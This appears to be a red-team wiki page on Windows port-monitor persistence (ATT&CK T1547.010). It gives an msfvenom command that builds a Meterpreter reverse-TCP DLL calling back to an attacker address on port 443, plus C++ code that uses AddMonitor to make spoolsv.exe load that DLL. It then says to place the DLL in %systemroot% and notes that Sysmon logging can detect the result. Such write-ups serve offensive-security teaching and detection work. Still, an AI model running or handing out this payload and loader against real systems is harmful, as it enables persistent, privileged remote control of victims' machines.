AddMonitor()
Persistence, Privilege Escalation

Execution

Generating a 64-bit meterpreter payload to be injected into the spoolsv.exe:
1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > evil64.dll
Copied!
Writing and compiling a simple C++ code that will register the monitor port:
monitor.cpp
1
#include "stdafx.h"
2
#include "Windows.h"
3
4
int main() {
5
MONITOR_INFO_2 monitorInfo;
6
TCHAR env[12] = TEXT("Windows x64");
7
TCHAR name[12] = TEXT("evilMonitor");
8
TCHAR dll[12] = TEXT("evil64.dll");
9
monitorInfo.pName = name;
10
monitorInfo.pEnvironment = env;
11
monitorInfo.pDLLName = dll;
12
AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
13
return 0;
14
}
Copied!
T1013-PortMonitor64.exe
59KB
Binary
PortMonitor64
evil64.dll
5KB
Binary
evil64.dll - meterpreter payload
Move evil64.dll to %systemroot% and execute the compiled monitor.cpp.

Observations

Upon launching the compiled executable and inspecting the victim machine with procmon, we can see that the evil64.dll is being accessed by the spoolsvc:
which eventually spawns a rundll32 with meterpreter payload, that initiates a connection back to the attacker:
The below confirms the procmon results explained above:
Sysmon commandline arguments and network connection logging to the rescue:

References

Boot or Logon Autostart Execution: Port Monitors, Sub-technique T1547.010 - Enterprise | MITRE ATT&CK®
https://msdn.microsoft.com/en-us/library/windows/desktop/dd183341(v=vs.85).aspx
msdn.microsoft.com
https://msdn.microsoft.com/en-us/library/windows/desktop/dd145068(v=vs.85).aspx
msdn.microsoft.com
Last modified 2yr ago